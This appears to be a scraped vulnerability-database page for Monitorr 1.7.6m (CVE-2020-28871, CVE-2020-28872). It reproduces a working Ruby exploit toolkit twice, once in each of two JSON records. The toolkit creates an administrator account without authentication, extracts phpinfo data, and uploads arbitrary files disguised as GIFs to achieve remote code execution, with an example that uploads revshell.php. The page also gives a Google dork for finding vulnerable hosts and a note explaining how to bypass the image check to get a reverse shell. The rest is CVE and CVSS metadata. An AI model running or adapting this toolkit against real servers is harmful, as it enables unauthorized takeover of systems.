Monitorr 1.7.6m Bypass / Information Disclosure / Shell Upload

2021-06-23T00:00:00

Description

{"id": "PACKETSTORM:163263", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Monitorr 1.7.6m Bypass / Information Disclosure / Shell Upload", "description": "", "published": "2021-06-23T00:00:00", "modified": "2021-06-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html", "reporter": "Alexandre Zanni", "references": [], "cvelist": ["CVE-2020-28871", "CVE-2020-28872"], "immutableFields": [], "lastseen": "2021-06-23T16:11:54", "viewCount": 99, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:01D089B0-49C7-4911-83C7-E067B19B1391", "AKB:D03CE7BC-077B-48C8-AFB3-2D53E41EA8CD"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3269"]}, {"type": "cve", "idList": ["CVE-2020-28871", "CVE-2020-28872"]}, {"type": "zdt", "idList": ["1337DAY-ID-36471"]}], "rev": 4}, "score": {"value": 4.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:01D089B0-49C7-4911-83C7-E067B19B1391", "AKB:D03CE7BC-077B-48C8-AFB3-2D53E41EA8CD"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3269"]}, {"type": "cve", "idList": ["CVE-2020-28871"]}, {"type": "zdt", "idList": ["1337DAY-ID-36471"]}]}, "exploitation": null, "vulnersScore": 4.4}, "sourceHref": "https://packetstormsecurity.com/files/download/163263/monitorr176m-shellbypass.txt", "sourceData": "`#!/usr/bin/env ruby \n \n# Exploit \n## Title: Monitorr exploit toolkit \n## Google Dorks: \n## inurl:/assets/config/_installation/_register.php?action=register \n## Author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n## Author website: https://pwn.by/noraj/ \n## Exploit source: https://github.com/sec-it/monitorr-exploit-toolkit \n## Date: 2021-06-22 \n## Vendor Homepage: https://github.com/Monitorr/Monitorr/ \n## Software Link: https://github.com/Monitorr/Monitorr/archive/refs/tags/1.7.6m.tar.gz \n## Version: at least 1.7.6m \n## Tested on: OpenNetAdmin 1.7.6.m \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nMonitorr-Exploit \n \nUsage: \n#{__FILE__} upload <url> <file> [--debug] \n#{__FILE__} create <url> <user> <pass> <email> [--debug] \n#{__FILE__} version <url> [--debug] \n#{__FILE__} phpinfo <url> [--debug] \n#{__FILE__} -h | --help \n \nupload: Upload a file (RCE via unrestricted file upload) \nversion: Try to fetch Monitorr version \nphpinfo: Extract main phpinfo() information (Information leakage) \ncreate: Create an administrator account (Authorization bypass) \n \nOptions: \n<url> Root URL (base path) including HTTP scheme, port and root folder \n<file> File to be uploaded \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} upload http://example.org revshell.php \n#{__FILE__} create https://example.org:8080/monitorr/ noraj password 'noraj@pentest.local' \n#{__FILE__} version https://example.org:7000/ \nDOCOPT \n \ndef version(root_url) \nvuln_url = \"#{root_url}/assets/js/version/version.txt\" \n \nHTTPX.get(vuln_url).body.to_s \nend \n \ndef phpinfo(root_url) \nvuln_url = \"#{root_url}/assets/php/phpinfo.php\" \n \nres = HTTPX.get(vuln_url).body.to_s \nsys = res.match(/>System\\s?<\\/td><td .+>(.+)<\\/td>/).captures[0].chomp \nphpver = res.match(/>PHP Version\\s?<\\/td><td .+>(.+)<\\/td>/).captures[0].chomp \ndisablef = res.match(/>disable_functions\\s?<\\/td><td .+>(.+)<\\/td>/).captures[0].chomp \nopenb = res.match(/>open_basedir\\s?<\\/td><td .+>(.+)<\\/td>/).captures[0].chomp \n \n\"System: #{sys}\\nPHP version: #{phpver}\\ndisable_functions: #{disablef}\\nopen_basedir: #{openb}\\n\\n\" \\ \n\"Full phpinfo() location: #{vuln_url}\" \nend \n \n# Password size should be >= 6 \ndef create_user(root_url, username, password, email) \nvuln_url = \"#{root_url}/assets/config/_installation/_register.php?action=register\" \n \nparams = { \n'user_name' => username, \n'user_email' => email, \n'user_password_new' => password, \n'user_password_repeat' => password, \n'register' => 'Register' \n} \n \nsuccess = HTTPX.post(vuln_url, form: params).body.to_s.match?(/User credentials have been created successfully/) \n \nreturn '[-] User not created' unless success \n \n\"[+] User created\\nUsername: #{username}\\nEmail: #{email}\\nPassword: #{password}\" \nend \n \ndef upload(root_url, filepath) \nvuln_url = \"#{root_url}/assets/php/upload.php\" \npn = Pathname.new(filepath) \n \nparams = { \nfileToUpload: { \ncontent_type: 'image/gif', \nfilename: pn.basename.to_s, \nbody: pn \n} \n} \n \nres = HTTPX.plugin(:multipart).post(vuln_url, form: params) \n \nreturn '[-] File not upload' unless (200..299).include?(res.status) \n \n\"[+] File uploaded:\\n#{root_url}/assets/data/usrimg/#{pn.basename}\" \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif args['version'] \nputs version(args['<url>']) \nelsif args['phpinfo'] \nputs phpinfo(args['<url>']) \nelsif args['create'] \nputs create_user(args['<url>'], args['<user>'], args['<pass>'], args['<email>']) \nelsif args['upload'] \nputs upload(args['<url>'], args['<file>']) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n`\n", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646255364}}

{"zdt": [{"lastseen": "2021-12-28T04:13:34", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "zdt", "title": "Monitorr 1.7.6m Bypass / Information Disclosure / Shell Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28871", "CVE-2020-28872"], "modified": "2021-06-23T00:00:00", "id": "1337DAY-ID-36471", "href": "https://0day.today/exploit/description/36471", "sourceData": "#!/usr/bin/env ruby\n\n# Exploit\n## Title: Monitorr exploit toolkit\n## Google Dorks:\n## inurl:/assets/config/_installation/_register.php?action=register\n## Author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n## Author website: https://pwn.by/noraj/\n## Exploit source: https://github.com/sec-it/monitorr-exploit-toolkit\n## Date: 2021-06-22\n## Vendor Homepage: https://github.com/Monitorr/Monitorr/\n## Software Link: https://github.com/Monitorr/Monitorr/archive/refs/tags/1.7.6m.tar.gz\n## Version: at least 1.7.6m\n## Tested on: OpenNetAdmin 1.7.6.m\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n Monitorr-Exploit\n\n Usage:\n #{__FILE__} upload <url> <file> [--debug]\n #{__FILE__} create <url> <user> <pass> <email> [--debug]\n #{__FILE__} version <url> [--debug]\n #{__FILE__} phpinfo <url> [--debug]\n #{__FILE__} -h | --help\n\n upload: Upload a file (RCE via unrestricted file upload)\n version: Try to fetch Monitorr version\n phpinfo: Extract main phpinfo() information (Information leakage)\n create: Create an administrator account (Authorization bypass)\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <file> File to be uploaded\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} upload http://example.org revshell.php\n #{__FILE__} create https://example.org:8080/monitorr/ noraj password '[email\u00a0protected]'\n #{__FILE__} version https://example.org:7000/\nDOCOPT\n\ndef version(root_url)\n vuln_url = \"#{root_url}/assets/js/version/version.txt\"\n\n HTTPX.get(vuln_url).body.to_s\nend\n\ndef phpinfo(root_url)\n vuln_url = \"#{root_url}/assets/php/phpinfo.php\"\n\n res = HTTPX.get(vuln_url).body.to_s\n sys = res.match(/>System\\s?<\\/td><td .+>(.+)<\\/td>/).captures[0].chomp\n phpver = res.match(/>PHP Version\\s?<\\/td><td .+>(.+)<\\/td>/).captures[0].chomp\n disablef = res.match(/>disable_functions\\s?<\\/td><td .+>(.+)<\\/td>/).captures[0].chomp\n openb = res.match(/>open_basedir\\s?<\\/td><td .+>(.+)<\\/td>/).captures[0].chomp\n\n \"System: #{sys}\\nPHP version: #{phpver}\\ndisable_functions: #{disablef}\\nopen_basedir: #{openb}\\n\\n\" \\\n \"Full phpinfo() location: #{vuln_url}\"\nend\n\n# Password size should be >= 6\ndef create_user(root_url, username, password, email)\n vuln_url = \"#{root_url}/assets/config/_installation/_register.php?action=register\"\n\n params = {\n 'user_name' => username,\n 'user_email' => email,\n 'user_password_new' => password,\n 'user_password_repeat' => password,\n 'register' => 'Register'\n }\n\n success = HTTPX.post(vuln_url, form: params).body.to_s.match?(/User credentials have been created successfully/)\n\n return '[-] User not created' unless success\n\n \"[+] User created\\nUsername: #{username}\\nEmail: #{email}\\nPassword: #{password}\"\nend\n\ndef upload(root_url, filepath)\n vuln_url = \"#{root_url}/assets/php/upload.php\"\n pn = Pathname.new(filepath)\n\n params = {\n fileToUpload: {\n content_type: 'image/gif',\n filename: pn.basename.to_s,\n body: pn\n }\n }\n\n res = HTTPX.plugin(:multipart).post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/assets/data/usrimg/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['version']\n puts version(args['<url>'])\n elsif args['phpinfo']\n puts phpinfo(args['<url>'])\n elsif args['create']\n puts create_user(args['<url>'], args['<user>'], args['<pass>'], args['<email>'])\n elsif args['upload']\n puts upload(args['<url>'], args['<file>'])\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36471", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:09:14", "description": "An authorization bypass vulnerability in Monitorr v1.7.6m in Monitorr/assets/config/_installation/_register.php allows an unauthorized person to create valid credentials.\n\n \n**Recent assessments:** \n \n**noraj** at June 22, 2021 4:52pm UTC reported:\n\nThis gives the ability to create an administrator account while being unauthenticated. The admin account is rather useless because all other vulnerabilities (unrestricted file upload, information leakage) are unauthenticated too so and admin account is not required.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-28872", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28872"], "modified": "2021-04-22T00:00:00", "id": "AKB:01D089B0-49C7-4911-83C7-E067B19B1391", "href": "https://attackerkb.com/topics/6Z11lAQIqJ/cve-2020-28872", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:09:18", "description": "Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload.\n\n \n**Recent assessments:** \n \n**noraj** at June 22, 2021 4:56pm UTC reported:\n\nThe uploaded file must have an image magic byte (eg. GIF) in order to match [getimagesize](<https://www.php.net/manual/en/function.getimagesize.php>) ([code](<https://github.com/Monitorr/Monitorr/blob/efff8fd71eac6369fa187e02d86341f35790af35/assets/php/upload.php#L7>)) then you can easily have a reverse shell on the machine.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-28871", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28871"], "modified": "2021-02-17T00:00:00", "id": "AKB:D03CE7BC-077B-48C8-AFB3-2D53E41EA8CD", "href": "https://attackerkb.com/topics/UNlzoDVL3o/cve-2020-28871", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T17:14:00", "description": "An authorization bypass vulnerability in Monitorr v1.7.6m in Monitorr/assets/config/_installation/_register.php allows an unauthorized person to create valid credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-12T14:15:00", "type": "cve", "title": "CVE-2020-28872", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28872"], "modified": "2021-06-23T18:15:00", "cpe": ["cpe:/a:monitorr_project:monitorr:1.7.6m"], "id": "CVE-2020-28872", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28872", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T17:13:55", "description": "Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-10T01:15:00", "type": "cve", "title": "CVE-2020-28871", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28871"], "modified": "2021-06-23T18:15:00", "cpe": ["cpe:/a:monitorr_project:monitorr:1.7.6m"], "id": "CVE-2020-28871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28871", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:00", "description": "A remote code execution vulnerability exists in Monitorr. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-23T00:00:00", "type": "checkpoint_advisories", "title": "Monitorr Remote Code Execution (CVE-2020-28871)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28871"], "modified": "2021-02-23T00:00:00", "id": "CPAI-2020-3269", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

Monitorr 1.7.6m Bypass / Information Disclosure / Shell Upload

Description

Related